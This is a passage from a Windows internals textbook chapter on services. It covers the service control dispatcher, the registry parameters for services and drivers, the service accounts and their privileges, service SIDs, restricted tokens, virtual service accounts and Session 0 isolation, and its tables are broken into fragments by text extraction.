(before a well-defined timeout expires—see the “Service logon” section for
more details). StartServiceCtrlDispatcher accepts a list of entry points into
services, with one entry point for each service in the process. Each entry
point is identified by the name of the service the entry point corresponds to.
After making a local RPC (ALPC) communications connection to the SCM
(which acts as a pipe), StartServiceCtrlDispatcher waits in a loop for
commands to come through the pipe from the SCM. Note that the handle of
the connection is saved by the SCM in an internal list, which is used for
sending and receiving service commands to the right process. The SCM
sends a service-start command each time it starts a service the process owns.
For each start command it receives, the StartServiceCtrlDispatcher function
creates a thread, called a service thread, to invoke the starting service’s entry
point (Service Main) and implement the command loop for the service.
StartServiceCtrlDispatcher waits indefinitely for commands from the SCM
and returns control to the process’s main function only when all the process’s
services have stopped, allowing the service process to clean up resources
before exiting.
A service entry point’s (ServiceMain) first action is to call the
RegisterServiceCtrlHandler function. This function receives and stores a
pointer to a function, called the control handler, which the service
implements to handle various commands it receives from the SCM.
RegisterServiceCtrlHandler doesn’t communicate with the SCM, but it stores
the function in local process memory for the StartServiceCtrlDispatcher
function. The service entry point continues initializing the service, which can
include allocating memory, creating communications end points, and reading
private configuration data from the registry. As explained earlier, a
convention most services follow is to store their parameters under a subkey
of their service registry key, named Parameters.
While the entry point is initializing the service, it must periodically send
status messages, using the SetServiceStatus function, to the SCM indicating
how the service’s startup is progressing. After the entry point finishes
initialization (the service indicates this to the SCM through the
SERVICE_RUNNING status), a service thread usually sits in a loop waiting
for requests from client applications. For example, a web server would
initialize a TCP listen socket and wait for inbound HTTP connection
requests.
A service process’s main thread, which executes in the
StartServiceCtrlDispatcher function, receives SCM commands directed at
services in the process and invokes the target service’s control handler
function (stored by RegisterServiceCtrlHandler). SCM commands include
stop, pause, resume, interrogate, and shutdown or application-defined
commands. Figure 10-8 shows the internal organization of a service process
—the main thread and the service thread that make up a process hosting one
service.
Figure 10-8 Inside a service process.
Service characteristics
The SCM stores each characteristic as a value in the service’s registry key.
Figure 10-9 shows an example of a service registry key.
Figure 10-9 Example of a service registry key.
Table 10-7 lists all the service characteristics, many of which also apply to
device drivers. (Not every characteristic applies to every type of service or
device driver.)
Table 10-7 Service and Driver Registry Parameters
V
al
ue
Se
tti
ng
Value Name
Value Setting Description
St
art
SERVICE_BOO
T_START (0x0)
Winload preloads the driver so that it is in
memory during the boot. These drivers are
initialized just prior to
SERVICE_SYSTEM_START drivers.
SERVICE_SYST
EM_START
(0x1)
The driver loads and initializes during kernel
initialization after SERVICE_BOOT_START
drivers have initialized.
SERVICE_AUT
O_START (0x2)
The SCM starts the driver or service after the
SCM process, Services.exe, starts.
SERVICE_DEM
AND_START
(0x3)
The SCM starts the driver or service on
demand (when a client calls StartService on it,
it is trigger started, or when another starting
service is dependent on it.)
SERVICE_DISA
BLED (0x4)
The driver or service cannot be loaded or
initialized.
Er
ro
rC
on
tro
l
SERVICE_ERR
OR_IGNORE
(0x0)
Any error the driver or service returns is
ignored, and no warning is logged or
displayed.
SERVICE_ERR
OR_NORMAL
(0x1)
If the driver or service reports an error, an
event log message is written.
SERVICE_ERR
OR_SEVERE
(0x2)
If the driver or service returns an error and
last known good isn’t being used, reboot into
last known good; otherwise, log an event
message.
SERVICE_ERR
If the driver or service returns an error and
OR_CRITICAL
(0x3)
last known good isn’t being used, reboot into
last known good; otherwise, log an event
message.
Ty
pe
SERVICE_KER
NEL_DRIVER
(0x1)
Device driver.
SERVICE_FILE
_SYSTEM_DRI
VER (0x2)
Kernel-mode file system driver.
SERVICE_ADA
PTER (0x4)
Obsolete.
SERVICE_REC
OGNIZER_DRI
VER (0x8)
File system recognizer driver.
SERVICE_WIN3
2_OWN_PROCE
SS (0x10)
The service runs in a process that hosts only
one service.
SERVICE_WIN3
2_SHARE_PRO
CESS (0x20)
The service runs in a process that hosts
multiple services.
SERVICE_USE
R_OWN_PROC
ESS (0x50)
The service runs with the security token of the
logged-in user in its own process.
SERVICE_USE
R_SHARE_PRO
CESS (0x60)
The service runs with the security token of the
logged-in user in a process that hosts multiple
services.
SERVICE_INTE
RACTIVE_PRO
CESS (0x100)
The service is allowed to display windows on
the console and receive user input, but only on
the console session (0) to prevent interacting
with user/console applications on other
sessions. This option is deprecated.
Gr
ou
p
Group name
The driver or service initializes when its
group is initialized.
Ta
g
Tag number
The specified location in a group initialization
order. This parameter doesn’t apply to
services.
Im
ag
eP
at
h
Path to the
service or driver
executable file
If ImagePath isn’t specified, the I/O manager
looks for drivers in
%SystemRoot%\System32\Drivers. Required
for Windows services.
D
ep
en
d
O
n
Gr
ou
p
Group name
The driver or service won’t load unless a
driver or service from the specified group
loads.
D
ep
en
d
O
nS
Service name
The service won’t load until after the
specified service loads. This parameter
doesn’t apply to device drivers or services
with a start type different than
SERVICE_AUTO_START or
SERVICE_DEMAND_START.
er
vi
ce
O
bj
ec
tN
a
m
e
Usually
LocalSystem, but
it can be an
account name,
such as
.\Administrator
Specifies the account in which the service will
run. If ObjectName isn’t specified,
LocalSystem is the account used. This
parameter doesn’t apply to device drivers.
Di
sp
la
y
N
a
m
e
Name of the
service
The service application shows services by this
name. If no name is specified, the name of the
service’s registry key becomes its name.
D
el
et
eF
la
g
0 or 1 (TRUE or
FALSE)
Temporary flag set by the SCM when a
service is marked to be deleted.
D
es
cri
pti
on
Description of
service
Up to 32,767-byte description of the service.
Fa
ilu
Description of
actions the SCM
Failure actions include restarting the service
process, rebooting the system, and running a
re
A
cti
on
s
should take when
the service
process exits
unexpectedly
specified program. This value doesn’t apply to
drivers.
Fa
ilu
re
C
o
m
m
an
d
Program
command line
The SCM reads this value only if
FailureActions specifies that a program
should execute upon service failure. This
value doesn’t apply to drivers.
D
el
ay
ed
A
ut
oS
tar
t
0 or 1 (TRUE or
FALSE)
Tells the SCM to start this service after a
certain delay has passed since the SCM was
started. This reduces the number of services
starting simultaneously during startup.
Pr
es
hu
td
o
w
nT
im
eo
ut
Timeout in
milliseconds
This value allows services to override the
default preshutdown notification timeout of
180 seconds. After this timeout, the SCM
performs shutdown actions on the service if it
has not yet responded.
Se
rvi
ce
Si
dT
yp
e
SERVICE_SID_T
YPE_NONE
(0x0)
Backward-compatibility setting.
SERVICE_SID_T
YPE_UNRESTRI
CTED (0x1)
The SCM adds the service SID as a group
owner to the service process’s token when it
is created.
SERVICE_SID_T
YPE_RESTRICT
ED (0x3)
The SCM runs the service with a write-
restricted token, adding the service SID to the
restricted SID list of the service process,
along with the world, logon, and write-
restricted SIDs.
Al
ias
String
Name of the service’s alias.
Re
qu
ire
dP
riv
ile
ge
s
List of privileges
This value contains the list of privileges that
the service requires to function. The SCM
computes their union when creating the token
for the shared process related to this service, if
any.
Se
cu
rit
y
Security
descriptor
This value contains the optional security
descriptor that defines who has what access to
the service object created internally by the
SCM. If this value is omitted, the SCM
applies a default security descriptor.
La
un
ch
SERVICE_LAUN
CH_PROTECTE
D_NONE (0x0)
The SCM launches the service unprotected
(default value).
Pr
ot
ec
te
d
SERVICE_LAUN
CH_PROTECTE
D_WINDOWS
(0x1)
The SCM launches the service in a Windows
protected process.
SERVICE_LAUN
CH_PROTECTE
D_WINDOWS_
LIGHT (0x2)
The SCM launches the service in a Windows
protected process light.
SERVICE_LAUN
CH_PROTECTE
D_ANTIMALWA
RE_LIGHT (0x3)
The SCM launches the service in an
Antimalware protected process light.
SERVICE_LAUN
CH_PROTECTE
D_APP_LIGHT
(0x4)
The SCM launches the service in an App
protected process light (internal only).
Us
er
Se
rvi
ce
Fl
ag
s
USER_SERVICE
_FLAG_DSMA_
ALLOW (0x1)
Allow the default user to start the user service.
USER_SERVICE
_FLAG_NONDS
MA_ ALLOW
(0x2)
Do not allow the default user to start the
service.
Sv
c
H
os
tS
pli
0 or 1 (TRUE or
FALSE)
When set to, 1 prohibits the SCM to enable
Svchost splitting. This value applies only to
shared services.
tD
isa
bl
e
Pa
ck
ag
eF
ull
N
a
m
e
String
Package full name of a packaged service.
A
pp
Us
er
M
od
elI
d
String
Application user model ID (AUMID) of a
packaged service.
Pa
ck
ag
e
Or
igi
n
PACKAGE_ORI
GIN_UNSIGNED
(0x1)
PACKAGE_ORI
GIN_INBOX
(0x2)
PACKAGE_ORI
GIN_STORE
(0x3)
These values identify the origin of the AppX
package (the entity that has created it).
PACKAGE_ORI
GIN_DEVELOP
ER_UNSIGNED
(0x4)
PACKAGE_ORI
GIN_DEVELOP
ER_SIGNED
(0x5)
Note
The SCM does not access a service’s Parameters subkey until the service
is deleted, at which time the SCM deletes the service’s entire key,
including subkeys like Parameters.
Notice that Type values include three that apply to device drivers: device
driver, file system driver, and file system recognizer. These are used by
Windows device drivers, which also store their parameters as registry data in
the Services registry key. The SCM is responsible for starting non-PNP
drivers with a Start value of SERVICE_AUTO_START or
SERVICE_DEMAND_START, so it’s natural for the SCM database to include
drivers. Services use the other types, SERVICE_WIN32_OWN_PROCESS
and SERVICE_WIN32_SHARE_PROCESS, which are mutually exclusive.
An executable that hosts just one service uses the
SERVICE_WIN32_OWN_PROCESS type. In a similar way, an executable
that hosts multiple services specifies the
SERVICE_WIN32_SHARE_PROCESS. Hosting multiple services in a single
process saves system resources that would otherwise be consumed as
overhead when launching multiple service processes. A potential
disadvantage is that if one of the services of a collection running in the same
process causes an error that terminates the process, all the services of that
process terminate. Also, another limitation is that all the services must run
under the same account (however, if a service takes advantage of service
security hardening mechanisms, it can limit some of its exposure to malicious
attacks). The SERVICE_USER_SERVICE flag is added to denote a user
service, which is a type of service that runs with the identity of the currently
logged-on user
Trigger information is normally stored by the SCM under another subkey
named TriggerInfo. Each trigger event is stored in a child key named as the
event index, starting from 0 (for example, the third trigger event is stored in
the “TriggerInfo\2” subkey). Table 10-8 lists all the possible registry values
that compose the trigger information.
Table 10-8 Triggered services registry parameters
Val
ue
Set
tin
g
Value Name
Value Setting Description
Act
ion
SERVICE_TRIGGER
_ACTION_SERVICE
_ START (0x1)
Start the service when the trigger event
occurs.
SERVICE_TRIGGER
_ACTION_SERVICE
_ STOP (0x2)
Stop the service when the trigger event
occurs.
Typ
e
SERVICE_TRIGGER
_TYPE_DEVICE_
INTERFACE_ARRIV
AL (0x1)
Specifies an event triggered when a
device of the specified device interface
class arrives or is present when the
system starts.
SERVICE_TRIGGER
_TYPE_IP_ADDRES
Specifies an event triggered when an IP
address becomes available or
S_AVAILABILITY
(0x2)
unavailable on the network stack.
SERVICE_TRIGGER
_TYPE_DOMAIN_JO
IN (0x3)
Specifies an event triggered when the
computer joins or leaves a domain.
SERVICE_TRIGGER
_TYPE_FIREWALL_
PORT_EVENT (0x4)
Specifies an event triggered when a
firewall port is opened or closed.
SERVICE_TRIGGER
_TYPE_GROUP_PO
LICY (0x5)
Specifies an event triggered when a
machine or user policy change occurs.
SERVICE_TRIGGER
_TYPE_NETWORK_
ENDPOINT (0x6)
Specifies an event triggered when a
packet or request arrives on a particular
network protocol.
SERVICE_TRIGGER
_TYPE_CUSTOM
(0x14)
Specifies a custom event generated by
an ETW provider.
Gui
d
Trigger subtype
GUID
A GUID that identifies the trigger event
subtype. The GUID depends on the
Trigger type.
Dat
a[In
dex
]
Trigger-specific data
Trigger-specific data for the service
trigger event. This value depends on the
trigger event type.
Dat
aTy
pe[I
SERVICE_TRIGGER
_DATA_TYPE_BINA
RY (0x1)
The trigger-specific data is in binary
format.
nde
x]
SERVICE_TRIGGER
_DATA_TYPE_STRI
NG (0x2)
The trigger-specific data is in string
format.
SERVICE_TRIGGER
_DATA_TYPE_LEVE
L (0x3)
The trigger-specific data is a byte value.
SERVICE_TRIGGER
_DATA_TYPE_KEY
WORD_ANY (0x4)
The trigger-specific data is a 64-bit (8
bytes) unsigned integer value.
SERVICE_TRIGGER
_DATA_TYPE_KEY
WORD_ALL (0x5)
The trigger-specific data is a 64-bit (8
bytes) unsigned integer value.
Service accounts
The security context of a service is an important consideration for service
developers as well as for system administrators because it dictates which
resource the process can access. Most built-in services run in the security
context of an appropriate Service account (which has limited access rights, as
described in the following subsections). When a service installation program
or the system administrator creates a service, it usually specifies the security
context of the local system account (displayed sometimes as SYSTEM and
other times as LocalSystem), which is very powerful. Two other built-in
accounts are the network service and local service accounts. These accounts
have fewer capabilities than the local system account from a security
standpoint. The following subsections describe the special characteristics of
all the service accounts.
The local system account
The local system account is the same account in which core Windows user-
mode operating system components run, including the Session Manager
(%SystemRoot%\System32\Smss.exe), the Windows subsystem process
(Csrss.exe), the Local Security Authority process
(%SystemRoot%\System32\Lsass.exe), and the Logon process
(%SystemRoot%\System32\Winlogon.exe). For more information on these
processes, see Chapter 7 in Part 1.
From a security perspective, the local system account is extremely
powerful—more powerful than any local or domain account when it comes
to security ability on a local system. This account has the following
characteristics:
■ It is a member of the local Administrators group. Table 10-9 shows
the groups to which the local system account belongs. (See Chapter 7
in Part 1 for information on how group membership is used in object
access checks.)
■ It has the right to enable all privileges (even privileges not normally
granted to the local administrator account, such as creating security
tokens). See Table 10-10 for the list of privileges assigned to the local
system account. (Chapter 7 in Part 1 describes the use of each
privilege.)
■ Most files and registry keys grant full access to the local system
account. Even if they don’t grant full access, a process running under
the local system account can exercise the take-ownership privilege to
gain access.
■ Processes running under the local system account run with the default
user profile (HKU\.DEFAULT). Therefore, they can’t directly access
configuration information stored in the user profiles of other accounts
(unless they explicitly use the LoadUserProfile API).
■ When a system is a member of a Windows domain, the local system
account includes the machine security identifier (SID) for the
computer on which a service process is running. Therefore, a service
running in the local system account will be automatically
authenticated on other machines in the same forest by using its
computer account. (A forest is a grouping of domains.)
■ Unless the machine account is specifically granted access to resources
(such as network shares, named pipes, and so on), a process can
access network resources that allow null sessions—that is,
connections that require no credentials. You can specify the shares
and pipes on a particular computer that permit null sessions in the
NullSessionPipes and NullSessionShares registry values under
HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Paramet
ers.
Table 10-9 Service account group membership (and integrity level)
Local System
Network
Service
Local Service
Service
Account
Administrators
Everyone
Authenticated
users
System
integrity level
Everyone
Users
Authenticated
users
Local
Network
service
Console logon
System
integrity level
Everyone
Users
Authenticated
users
Local
Local service
Console logon
UWP capabilities
groups
System integrity
level
Everyone
Users
Authenticated
users
Local
Local service
All services
Write
restricted
Console logon
High integrity
Level
Table 10-10 Service account privileges
Local System
Local Service /
Network Service
Service Account
SeAssignPrimaryTokenPrivile
ge
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivileg
e
SeCreateTokenPrivilege
SeDebugPrivilege
SeDelegateSessionUserImpers
onatePrivilege
SeAssignPrimary
TokenPrivilege
SeAuditPrivilege
SeChangeNotifyP
rivilege
SeCreateGlobalPr
ivilege
SeImpersonatePri
vilege
SeIncreaseQuotaP
rivilege
SeIncreaseWorkin
gSetPrivilege
SeShutdownPrivil
ege
SeSystemtimePriv
SeChangeNotify
Privilege
SeCreateGlobalP
rivilege
SeImpersonatePr
ivilege
SeIncreaseWorki
ngSetPrivilege
SeShutdownPrivi
lege
SeTimeZonePriv
ilege
SeUndockPrivile
ge
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivileg
e
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivileg
e
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivileg
e
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivileg
e
SeSystemProfilePrivilege
SeSystemtimePrivilege
ilege
SeTimeZonePrivil
ege
SeUndockPrivileg
e (client only)
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeTrustedCredManAccessPriv
ilege SeRelabelPrivilege
SeUndockPrivilege (client
only)
The network service account
The network service account is intended for use by services that want to
authenticate to other machines on the network using the computer account, as
does the local system account, but do not have the need for membership in
the Administrators group or the use of many of the privileges assigned to the
local system account. Because the network service account does not belong
to the Administrators group, services running in the network service account
by default have access to far fewer registry keys, file system folders, and files
than the services running in the local system account. Further, the assignment
of few privileges limits the scope of a compromised network service process.
For example, a process running in the network service account cannot load a
device driver or open arbitrary processes.
Another difference between the network service and local system accounts
is that processes running in the network service account use the network
service account’s profile. The registry component of the network service
profile loads under HKU\S-1-5-20, and the files and directories that make up
the component reside in %SystemRoot%\ServiceProfiles\NetworkService.
A service that runs in the network service account is the DNS client, which
is responsible for resolving DNS names and for locating domain controllers.
The local service account
The local service account is virtually identical to the network service account
with the important difference that it can access only network resources that
allow anonymous access. Table 10-10 shows that the network service account
has the same privileges as the local service account, and Table 10-9 shows
that it belongs to the same groups with the exception that it belongs to the
local service group instead of the network service group. The profile used by
processes running in the local service loads into HKU\S-1-5-19 and is stored
in %SystemRoot%\ServiceProfiles\LocalService.
Examples of services that run in the local service account include the
Remote Registry Service, which allows remote access to the local system’s
registry, and the LmHosts service, which performs NetBIOS name
resolution.
Running services in alternate accounts
Because of the restrictions just outlined, some services need to run with the
security credentials of a user account. You can configure a service to run in
an alternate account when the service is created or by specifying an account
and password that the service should run under with the Windows Services
MMC snap-in. In the Services snap-in, right-click a service and select
Properties, click the Log On tab, and select the This Account option, as
shown in Figure 10-10.
Figure 10-10 Service account settings.
Note that when required to start, a service running with an alternate
account is always launched using the alternate account credentials, even
though the account is not currently logged on. This means that the user
profile is loaded even though the user is not logged on. User Services, which
are described later in this chapter (in the “User services” section), have also
been designed to overcome this problem. They are loaded only when the user
logs on.
Running with least privilege
A service’s process typically is subject to an all-or-nothing model, meaning
that all privileges available to the account the service process is running
under are available to a service running in the process that might require only
a subset of those privileges. To better conform to the principle of least
privilege, in which Windows assigns services only the privileges they
require, developers can specify the privileges their service requires, and the
SCM creates a security token that contains only those privileges.
Service developers use the ChangeServiceConfig2 API (specifying the
SERVICE_CONFIG_REQUIRED_PRIVILEGES _INFO information level)
to indicate the list of privileges they desire. The API saves that information in
the registry into the RequiredPrivileges value of the root service key (refer to
Table 10-7). When the service starts, the SCM reads the key and adds those
privileges to the token of the process in which the service is running.
If there is a RequiredPrivileges value and the service is a stand-alone
service (running as a dedicated process), the SCM creates a token containing
only the privileges that the service needs. For services running as part of a
shared service process (as are a subset of services that are part of Windows)
and specifying required privileges, the SCM computes the union of those
privileges and combines them for the service-hosting process’s token. In
other words, only the privileges not specified by any of the services that are
hosted in the same service process will be removed. In the case in which the
registry value does not exist, the SCM has no choice but to assume that the
service is either incompatible with least privileges or requires all privileges to
function. In this case, the full token is created, containing all privileges, and
no additional security is offered by this model. To strip almost all privileges,
services can specify only the Change Notify privilege.
Note
The privileges a service specifies must be a subset of those that are
available to the service account in which it runs.
EXPERIMENT: Viewing privileges required by
services
You can view the privileges a service requires with the Service
Control utility, sc.exe, and the qprivs option. Additionally, Process
Explorer can show you information about the security token of any
service process on the system, so you can compare the information
returned by sc.exe with the privileges part of the token. The
following steps show you how to do this for some of the best
locked-down services on the system.
1.
Use sc.exe to look at the required privileges specified by
CryptSvc by typing the following into a command prompt:
sc qprivs cryptsvc
You should see three privileges being requested: the
SeChangeNotifyPrivilege, SeCreateGlobalPrivilege, and the
SeImpersonatePrivilege.
2.
Run Process Explorer as administrator and look at the
process list.
You should see multiple Svchost.exe processes that are
hosting the services on your machine (in case Svchost
splitting is enabled, the number of Svchost instances are
even more). Process Explorer highlights these in pink.
3.
CryptSvc is a service that runs in a shared hosting process.
In Windows 10, locating the correct process instance is
easily achievable through Task Manager. You do not need
to know the name of the Service DLL, which is listed in the
HKLM\SYSTEM\CurrentControlSet\Services\CryptSvc
\Parameters registry key.
4.
Open Task Manager and look at the Services tab. You
should easily find the PID of the CryptSvc hosting process.
5.
Return to Process Explorer and double-click the
Svchost.exe process that has the same PID found by Task
Manager to open the Properties dialog box.
6.
Double check that the Services tab includes the CryptSvc
service. If service splitting is enabled, it should contain only
one service; otherwise, it will contain multiple services.
Then click the Security tab. You should see security
information similar to the following figure:
Note that although the service is running as part of the local
service account, the list of privileges Windows assigned to it is
much shorter than the list available to the local service account
shown in Table 10-10.
For a service-hosting process, the privileges part of the token is
the union of the privileges requested by all the services running
inside it, so this must mean that services such as DnsCache and
LanmanWorkstation have not requested privileges other than the
ones shown by Process Explorer. You can verify this by running
the Sc.exe tool on those other services as well (only if Svchost
Service Splitting is disabled).
Service isolation
Although restricting the privileges that a service has access to helps lessen
the ability of a compromised service process to compromise other processes,
it does nothing to isolate the service from resources that the account in which
it is running has access under normal conditions. As mentioned earlier, the
local system account has complete access to critical system files, registry
keys, and other securable objects on the system because the access control
lists (ACLs) grant permissions to that account.
At times, access to some of these resources is critical to a service’s
operation, whereas other objects should be secured from the service.
Previously, to avoid running in the local system account to obtain access to
required resources, a service would be run under a standard user account, and
ACLs would be added on the system objects, which greatly increased the risk
of malicious code attacking the system. Another solution was to create
dedicated service accounts and set specific ACLs for each account
(associated to a service), but this approach easily became an administrative
hassle.
Windows now combines these two approaches into a much more
manageable solution: it allows services to run in a nonprivileged account but
still have access to specific privileged resources without lowering the
security of those objects. Indeed, the ACLs on an object can now set
permissions directly for a service, but not by requiring a dedicated account.
Instead, Windows generates a service SID to represent a service, and this SID
can be used to set permissions on resources such as registry keys and files.
The Service Control Manager uses service SIDs in different ways. If the
service is configured to be launched using a virtual service account (in the
NT SERVICE\ domain), a service SID is generated and assigned as the main
user of the new service’s token. The token will also be part of the NT
SERVICE\ALL SERVICES group. This group is used by the system to allow
a securable object to be accessed by any service. In the case of shared
services, the SCM creates the service-hosting processes (a process that
contains more than one service) with a token that contains the service SIDs
of all services that are part of the service group associated with the process,
including services that are not yet started (there is no way to add new SIDs
after a token has been created). Restricted and unrestricted services
(explained later in this section) always have a service SID in the hosting
process’s token.
EXPERIMENT: Understanding Service SIDs
In Chapter 9, we presented an experiment (“Understanding the
security of the VM worker process and the virtual hard disk files”)
in which we showed how the system generates VM SIDs for
different VM worker processes. Similar to the VM worker process,
the system generates Service SIDs using a well-defined algorithm.
This experiment uses Process Explorer to show service SIDs and
explains how the system generates them.
First, you need to choose a service that runs with a virtual
service account or under a restricted/nonrestricted access token.
Open the Registry Editor (by typing regedit in the Cortana search
box) and navigate to the
HKLM\SYSTEM\CurrentControlSet\Services registry key. Then
select Find from the Edit menu. As discussed previously in this
section, the service account is stored in the ObjectName registry
value. Unfortunately, you would not find a lot of services running
in a virtual service account (those accounts begin with the NT
SERVICE\ virtual domain), so it is better if you look at a restricted
token (unrestricted tokens work, too). Type ServiceSidType (the
value of which is stored whether the Service should run with a
restricted or unrestricted token) and click the Find Next button.
For this experiment, you are looking for a restricted service
account (which has the ServiceSidType value set to 3), but
unrestricted services work well, too (the value is set to 1). If the
desired value does not match, you can use the F3 button to find the
next service. In this experiment, use the BFE service.
Open Process Explorer, search the BFE hosting process (refer to
the previous experiment for understanding how to find the correct
one), and double-click it. Select the Security tab and click the NT
SERVICE\BFE Group (the human-readable notation of the service
SID) or the service SID of your service if you have chosen another
one. Note the extended group SID, which appears under the group
list (if the service is running under a virtual service account, the
service SID is instead shown by Process Explorer in the second
line of the Security Tab):
S-1-5-80-1383147646-27650227-2710666058-1662982300-
1023958487
The NT authority (ID 5) is responsible for the service SIDs,
generated by using the service base RID (80) and by the SHA-1
hash of the uppercased UTF-16 Unicode string of the service name.
SHA-1 is an algorithm that produces a 160-bit (20-bytes) value. In
the Windows security world, this means that the SID will have 5
(4-bytes) sub-authority values. The SHA-1 hash of the Unicode
(UTF-16) BFE service name is:
7e 28 71 52 b3 e8 a5 01 4a 7b 91 a1 9c 18 1f 63 d7 5d 08 3d
If you divide the produced hash in five groups of eight
hexadecimal digits, you will find the following:
■ 0x5271287E (first DWORD value), which equals
1383147646 in decimal (remember that Windows is a little
endian OS)
■ 0x01A5E8B3 (second DWORD value), which equals
27650227 in decimal
■ 0xA1917B4A (third DWORD value), which equals
2710666058 in decimal
■ 0x631F189C (fourth DWORD value), which equals
1662982300 in decimal
■ 0x3D085DD7 (fifth DWORD value), which equals
1023958487 in decimal
If you combine the numbers and add the service SID authority
value and first RID (S-1-5-80), you build the same SID shown by
Process Explorer. This demonstrates how the system generates
service SIDs.
The usefulness of having a SID for each service extends beyond the mere
ability to add ACL entries and permissions for various objects on the system
as a way to have fine-grained control over their access. Our discussion
initially covered the case in which certain objects on the system, accessible
by a given account, must be protected from a service running within that
same account. As we’ve previously described, service SIDs prevent that
problem only by requiring that Deny entries associated with the service SID
be placed on every object that needs to be secured, which is a clearly an
unmanageable approach.
To avoid requiring Deny access control entries (ACEs) as a way to prevent
services from having access to resources that the user account in which they
run does have access, there are two types of service SIDs: the restricted
service SID (SERVICE_SID_TYPE_RESTRICTED) and the unrestricted
service SID (SERVICE_SID_TYPE_UNRESTRICTED), the latter being the
default and the case we’ve looked at up to now. The names are a little
misleading in this case. The service SID is always generated in the same way
(see the previous experiment). It is the token of the hosting process that is
generated in a different way.
Unrestricted service SIDs are created as enabled-by-default, group owner
SIDs, and the process token is also given a new ACE that provides full
permission to the service logon SID, which allows the service to continue
communicating with the SCM. (A primary use of this would be to enable or
disable service SIDs inside the process during service startup or shutdown.)
A service running with the SYSTEM account launched with an unrestricted
token is even more powerful than a standard SYSTEM service.
A restricted service SID, on the other hand, turns the service-hosting
process’s token into a write-restricted token. Restricted tokens (see Chapter 7
of Part 1 for more information on tokens) generally require the system to
perform two access checks while accessing securable objects: one using the
standard token’s enabled group SIDs list, and another using the list of
restricted SIDs. For a standard restricted token, access is granted only if both
access checks allow the requested access rights. On the other hand, write-
restricted tokens (which are usually created by specifying the
WRITE_RESTRICTED flag to the CreateRestrictedToken API) perform the
double access checks only for write requests: read-only access requests raise
just one access check on the token’s enabled group SIDs as for regular
tokens.
The service host process running with a write-restricted token can write
only to objects granting explicit write access to the service SID (and the
following three supplemental SIDs added for compatibility), regardless of the
account it’s running. Because of this, all services running inside that process
(part of the same service group) must have the restricted SID type; otherwise,
services with the restricted SID type fail to start. Once the token becomes
write-restricted, three more SIDs are added for compatibility reasons:
■ The world SID is added to allow write access to objects that are
normally accessible by anyone anyway, most importantly certain
DLLs in the load path.
■ The service logon SID is added to allow the service to communicate
with the SCM.
■ The write-restricted SID is added to allow objects to explicitly allow
any write-restricted service write access to them. For example, ETW
uses this SID on its objects to allow any write-restricted service to
generate events.
Figure 10-11 shows an example of a service-hosting process containing
services that have been marked as having restricted service SIDs. For
example, the Base Filtering Engine (BFE), which is responsible for applying
Windows Firewall filtering rules, is part of this hosting process because these
rules are stored in registry keys that must be protected from malicious write
access should a service be compromised. (This could allow a service exploit
to disable the outgoing traffic firewall rules, enabling bidirectional
communication with an attacker, for example.)
Figure 10-11 Service with restricted SIDs.
By blocking write access to objects that would otherwise be writable by
the service (through inheriting the permissions of the account it is running
as), restricted service SIDs solve the other side of the problem we initially
presented because users do not need to do anything to prevent a service
running in a privileged account from having write access to critical system
files, registry keys, or other objects, limiting the attack exposure of any such
service that might have been compromised.
Windows also allows for firewall rules that reference service SIDs linked
to one of the three behaviors described in Table 10-11.
Table 10-11 Network restriction rules
Scenario
Example
Restrictions
Network
access blocked
The shell hardware
detection service
(ShellHWDetection).
All network
communications are
blocked (both incoming and
outgoing).
Network
access
statically port-
restricted
The RPC service
(Rpcss) operates on
port 135 (TCP and
UDP).
Network communications
are restricted to specific
TCP or UDP ports.
Network
access
dynamically
port-restricted
The DNS service (Dns)
listens on variable
ports (UDP).
Network communications
are restricted to
configurable TCP or UDP
ports.
The virtual service account
As introduced in the previous section, a service SID also can be set as the
owner of the token of a service running in the context of a virtual service
account. A service running with a virtual service account has fewer privileges
than the LocalService or NetworkService service types (refer to Table 10-10
for the list of privileges) and no credentials available to authenticate it
through the network. The Service SID is the token’s owner, and the token is
part of the Everyone, Users, Authenticated Users, and All Services groups.
This means that the service can read (or write, unless the service uses a
restricted SID type) objects that belong to standard users but not to high-
privileged ones belonging to the Administrator or System group. Unlike the
other types, a service running with a virtual service account has a private
profile, which is loaded by the ProfSvc service (Profsvc.dll) during service
logon, in a similar way as for regular services (more details in the “Service
logon” section). The profile is initially created during the first service logon
using a folder with the same name as the service located in the
%SystemRoot%\ServiceProfiles path. When the service’s profile is loaded,
its registry hive is mounted in the HKEY_USERS root key, under a key
named as the virtual service account’s human readable SID (starting with S-
1-5-80 as explained in the “Understanding service SIDs” experiment).
Users can easily assign a virtual service account to a service by setting the
log-on account to NT SERVICE\<ServiceName>, where <ServiceName> is
the name of the service. At logon time, the Service Control Manager
recognizes that the log-on account is a virtual service account (thanks to the
NT SERVICE logon provider) and verifies that the account’s name
corresponds to the name of the service. A service can’t be started using a
virtual service account that belongs to another one, and this is enforced by
SCM (through the internal ScIsValidAccountName function). Services that
share a host process cannot run with a virtual service account.
While operating with securable objects, users can add to the object’s ACL
using the service log-on account (in the form of NT SERVICE\
<ServiceName>), an ACE that allows or denies access to a virtual service. As
shown in Figure 10-12, the system is able to translate the virtual service
account’s name to the proper SID, thus establishing fine-grained access
control to the object from the service. (This also works for regular services
running with a nonsystem account, as explained in the previous section.)
Figure 10-12 A file (securable object) with an ACE allowing full access to
the TestService.
Interactive services and Session 0 Isolation
One restriction for services running under a proper service account, the local
system, local service, and network service accounts that has always been
present in Windows is that these services could not display dialog boxes or
windows on the interactive user’s desktop. This limitation wasn’t the direct
result of running under these accounts but rather a consequence of the way
the Windows subsystem assigns service processes to window stations. This
restriction is further enhanced by the use of sessions, in a model called
Session 0 Isolation, a result of which is that services cannot directly interact
with a user’s desktop.
The Windows subsystem associates every Windows process with a
window station. A window station contains desktops, and desktops contain
windows. Only one window station can be visible at a time and receive user
mouse and keyboard input. In a Terminal Services environment, one window
station per session is visible, but services all run as part of the hidden session
0. Windows names the visible window station WinSta0, and all interactive
processes access WinSta0.
Unless otherwise directed, the Windows subsystem associates services
running within the proper service account or the local system account with a
